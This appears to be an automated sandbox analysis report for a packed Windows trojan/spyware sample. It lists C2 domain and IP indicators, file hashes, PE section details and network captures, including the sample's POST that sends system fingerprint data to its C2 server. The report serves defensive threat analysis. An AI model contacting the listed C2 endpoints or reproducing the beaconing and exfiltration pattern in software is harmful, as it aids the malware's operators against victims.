s8kPMNXOZY.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://home.fiveth5ht.top/OyKvQ | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fiveth5ht.top | 81.29.149.125 | true | false | | high
httpbin.org | 34.226.108.155 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | false | | high
https://httpbin.org/ip | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQ | s8kPMNXOZY.exe, 00000000.00000003.1398993637.0000000000F73000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://html4/loose.dtd | s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/alt-svc.html# | s8kPMNXOZY.exe | false | | high
https://httpbin.org/ipbefore | s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/http-cookies.html | s8kPMNXOZY.exe, s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/hsts.html# | s8kPMNXOZY.exe | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963 | s8kPMNXOZY.exe, 00000000.00000003.1398627069.0000000000F03000.00000004.00000020.00020000.00000000.sdmp, s8kPMNXOZY.exe, 00000000.00000002.1406172841.0000000000F04000.00000004.00000020.00020000.00000000.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1398924001.0000000000F04000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/alt-svc.html | s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.css | s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.jpg | s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | false | | high

The curl.se entries are libcurl's own documentation links (the comment headers libcurl writes into its HSTS, Alt-Svc and cookie files), which places a statically linked libcurl inside the sample; they are embedded strings, not contacted hosts. The truncated and concatenated home.fiveth5ht.top variants are partial copies of the single C2 URL seen in traffic, http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862, and https://httpbin.org/ip is the sample's external-IP lookup.
IP | Domain | Country | ASN | ASN Name | Malicious
34.226.108.155 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
81.29.149.125 | home.fiveth5ht.top | Switzerland | 39616 | COMUNICA_IT_SERVICESCH | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581592
Start date and time: 2024-12-28 09:34:31 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: s8kPMNXOZY.exe (renamed because the original name is a hash value)
Original Sample Name: fbba61c61fa706eec44a022a1e9e3bac.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@6/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53, 4.245.163.56
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:35:32 | API Interceptor | 3x Sleep call for process: s8kPMNXOZY.exe modified
09:35:16 | Task Scheduler | Run new task: {E8137BEC-A0E8-4A79-9371-57C6B4E9F5A6} path: .
IP address matches (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
34.226.108.155 | sYPORwmgwQ.exe | malicious | Unknown |
34.226.108.155 | CLaYpUL3zw.exe | malicious | LummaC |
34.226.108.155 | f7qbEfJl0B.exe | malicious | Unknown |
34.226.108.155 | 5KwhHEdmM4.exe | malicious | Unknown |
34.226.108.155 | dZsdMl5Pwl.exe | malicious | Unknown |
34.226.108.155 | OAKPYEH4c6.exe | malicious | LummaC |
34.226.108.155 | ZTM2pfyhu3.exe | malicious | LummaC |
34.226.108.155 | BkB1ur7aFW.exe | malicious | Unknown |
34.226.108.155 | 5uVReRlvME.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc |
34.226.108.155 | 3stIhG821a.exe | malicious | LummaC |
81.29.149.125 | GjZewfxHTi.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
81.29.149.125 | sYPORwmgwQ.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
81.29.149.125 | xdeRtWCeNH.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862

Domain matches (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
httpbin.org | vUcZzNWkKc.exe | malicious | LummaC | 3.218.7.103
httpbin.org | GjZewfxHTi.exe | malicious | Unknown | 3.218.7.103
httpbin.org | sYPORwmgwQ.exe | malicious | Unknown | 34.226.108.155
httpbin.org | CLaYpUL3zw.exe | malicious | LummaC | 34.226.108.155
httpbin.org | xdeRtWCeNH.exe | malicious | Unknown | 3.218.7.103
httpbin.org | f7qbEfJl0B.exe | malicious | Unknown | 34.226.108.155
httpbin.org | E205fJJS1Q.exe | malicious | LummaC | 3.218.7.103
httpbin.org | 5KwhHEdmM4.exe | malicious | Unknown | 34.226.108.155
httpbin.org | QzK1LCSuq2.exe | malicious | LummaC | 3.218.7.103
httpbin.org | dZsdMl5Pwl.exe | malicious | Unknown | 34.226.108.155
home.fiveth5ht.top | GjZewfxHTi.exe | malicious | Unknown | 81.29.149.125
home.fiveth5ht.top | sYPORwmgwQ.exe | malicious | Unknown | 81.29.149.125
home.fiveth5ht.top | xdeRtWCeNH.exe | malicious | Unknown | 81.29.149.125
home.fiveth5ht.top | f7qbEfJl0B.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | 5KwhHEdmM4.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | dZsdMl5Pwl.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | BkB1ur7aFW.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | OoYYtngD7d.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | NWJ4JvzFcs.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | EwhnoHx0n5.exe | malicious | Unknown | 5.101.3.217

ASN matches (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
COMUNICA_IT_SERVICESCH | GjZewfxHTi.exe | malicious | Unknown | 81.29.149.125
COMUNICA_IT_SERVICESCH | sYPORwmgwQ.exe | malicious | Unknown | 81.29.149.125
COMUNICA_IT_SERVICESCH | xdeRtWCeNH.exe | malicious | Unknown | 81.29.149.125
COMUNICA_IT_SERVICESCH | file.exe | malicious | LummaC, Amadey, LummaC Stealer, RHADAMANTHYS | 81.29.149.45
COMUNICA_IT_SERVICESCH | hmips.elf | malicious | Unknown | 81.29.149.178
COMUNICA_IT_SERVICESCH | ppc.elf | malicious | Unknown | 81.29.149.178
COMUNICA_IT_SERVICESCH | mips.elf | malicious | Unknown | 81.29.149.178
COMUNICA_IT_SERVICESCH | x86.elf | malicious | Unknown | 81.29.149.178
COMUNICA_IT_SERVICESCH | hmips.elf | malicious | Unknown | 81.29.149.178
COMUNICA_IT_SERVICESCH | arm5.elf | malicious | Unknown | 81.29.149.178
AMAZON-AESUS | vUcZzNWkKc.exe | malicious | LummaC | 3.218.7.103
AMAZON-AESUS | GjZewfxHTi.exe | malicious | Unknown | 3.218.7.103
AMAZON-AESUS | sYPORwmgwQ.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | CLaYpUL3zw.exe | malicious | LummaC | 34.226.108.155
AMAZON-AESUS | xdeRtWCeNH.exe | malicious | Unknown | 3.218.7.103
AMAZON-AESUS | https://fin.hiringplatform.ca/processes/197662-tax-legislation-officer-ec-06-ec-07?locale=en | malicious | Unknown | 54.225.146.64
AMAZON-AESUS | d8tp5flwzP.exe | malicious | Metasploit | 18.209.65.151
AMAZON-AESUS | f7qbEfJl0B.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | E205fJJS1Q.exe | malicious | LummaC | 3.218.7.103
AMAZON-AESUS | 5KwhHEdmM4.exe | malicious | Unknown | 34.226.108.155
                                                    No context
                                                    No context
                                                    No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.9863148053447715
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: s8kPMNXOZY.exe
File size: 4'500'992 bytes
MD5: fbba61c61fa706eec44a022a1e9e3bac
SHA1: 74e5e5e2ad5dfba941f35c8e207cad219b9ad21d
SHA256: 085ebe5916195a08c768e279650cdaa09b11b8ceda0fad4b9a499a4a3267b461
SHA512: 75d98196ee6fdf28b074ca8a2e17d27c7b3eaa187bd0f92fb02391090974ac649d450e14c0238cebb8c629884d3f3e2c9737888deaa12dbe12187fbf03e57e72
SSDEEP: 98304:cNLH9lv77mJ/g1Ef/DPJWUUz+TE88fc9vv43AYRSjasy1UtAxa:uL/zypmo4UeuYfcy3+DtUa
TLSH: 642633E625FF0BB3C225AF302CE68F76DB2AB9538FB7251392909475D41080761D978E
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@..................................zE...@... ............................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x1039000
Entrypoint Section: .taggant
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After:
Subject Chain:
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:
All signature fields above are empty in the report, so "Digitally signed: true" only records that the PE carries a certificate entry; no signer, validity window or validation result is shown, and the signature should be treated as unverified. Note also the entropy of 7.99 over a 4.5 MB file and the entry point in the non-standard .taggant section, both consistent with the packed/protected sample described in the behaviour sections.
                                                        Instruction
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6dd05f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6dc000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x708a00 | 0x688 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc374b4 | 0x10 | njaplbck
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc37464 | 0x18 | njaplbck
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x6db000 | 0x288a00 | a1091bcbd9b258524fe8ec18a7a1b859 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x6dc000 | 0x1ac | 0x200 | 022e8ee5fe0ba5d3308572c401d694ad | False | 0.5859375 | data | 4.587885049980031 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x6dd000 | 0x1000 | 0x200 | 6363462e4ea156e03144265f6be7871e | False | 0.166015625 | data | 1.1763897754724144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x6de000 | 0x39b000 | 0x200 | 053ea0e3f85490f8b31b60720b2f6b23 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
njaplbck | 0xa79000 | 0x1bf000 | 0x1be800 | d5b40eb0bed8da8c22280b0b769e4a98 | False | 0.9943981619190929 | data | 7.955985417488292 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rewyqdml | 0xc38000 | 0x1000 | 0x400 | 78f79b775c517af12a65eb296e687392 | False | 0.77734375 | data | 6.03322133003277 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc39000 | 0x3000 | 0x2200 | f352ea1b2a7929a71b5a20ff677b2a8f | False | 0.06215533088235294 | DOS executable (COM) | 0.7545454457783044 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc374c4 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402

DLL | Import
kernel32.dll | lstrcpy
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Dec 28, 2024 09:35:33.797815084 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.797873974 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.843439102 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.859076977 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.859181881 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.859266043 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.859602928 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.913748026 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.913772106 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.913826942 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.913836956 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.913938999 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.913949013 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.914896011 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915069103 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915079117 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915134907 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915167093 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915199041 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915266991 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915338039 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915397882 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915432930 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915478945 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915612936 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915640116 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915679932 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915718079 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915795088 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915851116 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915926933 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915936947 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916011095 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916021109 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916080952 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916186094 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916194916 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916203976 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916315079 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916325092 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916408062 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916416883 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916441917 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916515112 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916598082 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916606903 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916657925 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916708946 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916775942 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916791916 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916857958 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916910887 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916982889 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916991949 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917041063 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917066097 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917136908 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917160988 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917222023 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917248011 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917331934 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917355061 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917438984 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917468071 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917577982 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917608976 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917644978 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.978872061 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.978991032 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:34.581185102 CET4972180192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:34.700701952 CET804972181.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:34.701324940 CET4972180192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:34.701817989 CET4972180192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:34.821244001 CET804972181.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:36.012113094 CET804972181.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:36.012136936 CET804972181.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:36.012192011 CET4972180192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:36.012541056 CET4972180192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:36.132050037 CET804972181.29.149.125192.168.2.10
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Dec 28, 2024 09:35:27.319873095 CET  64726        53         192.168.2.10  1.1.1.1
Dec 28, 2024 09:35:27.319941998 CET  64726        53         192.168.2.10  1.1.1.1
Dec 28, 2024 09:35:27.460283041 CET  53           64726      1.1.1.1       192.168.2.10
Dec 28, 2024 09:35:27.630944967 CET  53           64726      1.1.1.1       192.168.2.10
Dec 28, 2024 09:35:32.224473953 CET  64729        53         192.168.2.10  1.1.1.1
Dec 28, 2024 09:35:32.224543095 CET  64729        53         192.168.2.10  1.1.1.1
Dec 28, 2024 09:35:32.366559029 CET  53           64729      1.1.1.1       192.168.2.10
Dec 28, 2024 09:35:32.366573095 CET  53           64729      1.1.1.1       192.168.2.10
Dec 28, 2024 09:35:34.440361023 CET  64731        53         192.168.2.10  1.1.1.1
Dec 28, 2024 09:35:34.440414906 CET  64731        53         192.168.2.10  1.1.1.1
Dec 28, 2024 09:35:34.579833984 CET  53           64731      1.1.1.1       192.168.2.10
Dec 28, 2024 09:35:34.580034018 CET  53           64731      1.1.1.1       192.168.2.10
Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name                Type            Class        DNS over HTTPS
Dec 28, 2024 09:35:27.319873095 CET  192.168.2.10  1.1.1.1  0xac72    Standard query (0)  httpbin.org         A (IP address)  IN (0x0001)  false
Dec 28, 2024 09:35:27.319941998 CET  192.168.2.10  1.1.1.1  0x8b6f    Standard query (0)  httpbin.org         28              IN (0x0001)  false
Dec 28, 2024 09:35:32.224473953 CET  192.168.2.10  1.1.1.1  0x2822    Standard query (0)  home.fiveth5ht.top  A (IP address)  IN (0x0001)  false
Dec 28, 2024 09:35:32.224543095 CET  192.168.2.10  1.1.1.1  0x200     Standard query (0)  home.fiveth5ht.top  28              IN (0x0001)  false
Dec 28, 2024 09:35:34.440361023 CET  192.168.2.10  1.1.1.1  0xfdcf    Standard query (0)  home.fiveth5ht.top  A (IP address)  IN (0x0001)  false
Dec 28, 2024 09:35:34.440414906 CET  192.168.2.10  1.1.1.1  0xdb78    Standard query (0)  home.fiveth5ht.top  28              IN (0x0001)  false
Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name                CName  Address         Type            Class        DNS over HTTPS
Dec 28, 2024 09:35:27.630944967 CET  1.1.1.1    192.168.2.10  0xac72    No error (0)  httpbin.org         -      34.226.108.155  A (IP address)  IN (0x0001)  false
Dec 28, 2024 09:35:27.630944967 CET  1.1.1.1    192.168.2.10  0xac72    No error (0)  httpbin.org         -      3.218.7.103     A (IP address)  IN (0x0001)  false
Dec 28, 2024 09:35:32.366573095 CET  1.1.1.1    192.168.2.10  0x2822    No error (0)  home.fiveth5ht.top  -      81.29.149.125   A (IP address)  IN (0x0001)  false
Dec 28, 2024 09:35:34.579833984 CET  1.1.1.1    192.168.2.10  0xfdcf    No error (0)  home.fiveth5ht.top  -      81.29.149.125   A (IP address)  IN (0x0001)  false
                                                        • httpbin.org
                                                        • home.fiveth5ht.top
Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.10  49715        81.29.149.125   80                8156  C:\Users\user\Desktop\s8kPMNXOZY.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 28, 2024 09:35:32.489356995 CET  12360              OUT        POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
Host: home.fiveth5ht.top
Accept: */*
Content-Type: application/json
Content-Length: 461736
                                                        Data Ascii: { "ip": "8.46.123.189", "current_time": "8468739163627173968", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe" [TRUNCATED]
Dec 28, 2024 09:35:33.859076977 CET  212                IN         HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html
Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.10  49721        81.29.149.125   80                8156  C:\Users\user\Desktop\s8kPMNXOZY.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 28, 2024 09:35:34.701817989 CET  284                OUT        POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
Host: home.fiveth5ht.top
Accept: */*
Content-Type: application/json
Content-Length: 143
                                                        Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Dec 28, 2024 09:35:36.012113094 CET  212                IN         HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html
Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.10  49704        34.226.108.155  443               8156  C:\Users\user\Desktop\s8kPMNXOZY.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-28 08:35:29 UTC  52                 OUT        GET /ip HTTP/1.1
Host: httpbin.org
Accept: */*
2024-12-28 08:35:29 UTC  224                IN         HTTP/1.1 200 OK
